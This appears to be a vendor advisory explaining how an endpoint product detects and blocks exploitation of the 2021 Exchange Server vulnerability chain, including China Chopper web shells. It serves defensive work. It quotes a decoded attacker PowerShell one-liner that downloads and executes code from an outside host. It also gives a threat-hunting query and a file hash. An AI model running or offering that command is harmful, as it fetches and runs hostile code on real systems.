Description
Threat actors are actively leveraging the recent remote code execution vulnerabilities in MS Exchange Server 2013, Exchange Server 2016 and Exchange server 2019.
With the latest versions of FortiEDR (v4 or v5) installed on your MS Exchange (Windows Server) host, you are protected from the zero-day exploit, and you can also gain insights if anyone has attempted to exploit it.
In this operation, four specific vulnerabilities (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) are chained together to allow the threat actor to exploit on-premise Exchange servers. The attack chain targets a Microsoft Exchange server that is able to receive untrusted connections from an external source.
After exploiting these vulnerabilities to gain initial access, attackers deployed web shells on the compromised servers. Web shells potentially allow attackers to steal data and perform other malicious activities that lead to further compromise.
FortiEDR detects and blocks the web shells from executing, thereby defusing the exploit.
Solution
Pre-Execution
FortiEDR blocked adversaries attempt to drop the web shells on the vulnerable on-premise exchange servers.The web shell “discover.aspx” with the following script was blocked. After dropping the web shell, attacker would send a post request to it, passing the malicious commands in the parameter “Ananas”.Rules TriggeredThe threat marked as “MSIL/Chopper.Altr”, as this web shell also known as China Chopper was commonly used by malicious Chinese actors.The rule “Malicious File Detected” got triggered with the following automated analysis comment.
“The file was identified as malicious by our machine-learning engine or by other means, based on analysis of the file.”
In this instance, FortiEDR blocked w3wp.exe process from creating a web shell on a vulnerable exchange server.Post-ExecutionFortiEDR blocked the exploitation activity of these web shells. w3wp.exe (the IIS process associated with Exchange web front-end) spawning cmd.exe to run PowerShell to download additional payloads was blocked.Rules TriggeredThe policy and rule “Suspicious Application” got triggered with the following automated analysis comment.
“Fileless malware detected. Attempt to download and execute a remote command using powershell from a suspicious context. A base64 encoded code was executed on the system using powershell.exe. The command -enc was executed using PowerShell. The decoded command is: IEX (New-Object Net.WebClient).downloadstring('http://p.estonine.com/p?e').”
Threat HuntingFortiEDR’s (v5) Threat Hunting feature enables you to conduct further investigation. The following query helps to identify web shell usage and it can also be scheduled to run automatically to notify events that matches the query.Type:"Process Creation" AND Source.Process.Name:"w3wp.exe" AND Target.Process.Name:"cmd.exe"Default FortiEDR and FortiXDR deployments detect and block post-exploitation activity, including dumping the LSASS memory, running the Nishang and PowerCat tools described in the Microsoft blog.The latest FortiEDR v4.x and 5.x versions successfully detect and block the exploitation of Microsoft Exchange server.IOC:1e0803ffc283dd04279bf3351b92614325e643564ed5b4004985eb0486bf44eeFor additional information, please refer to the following blogs
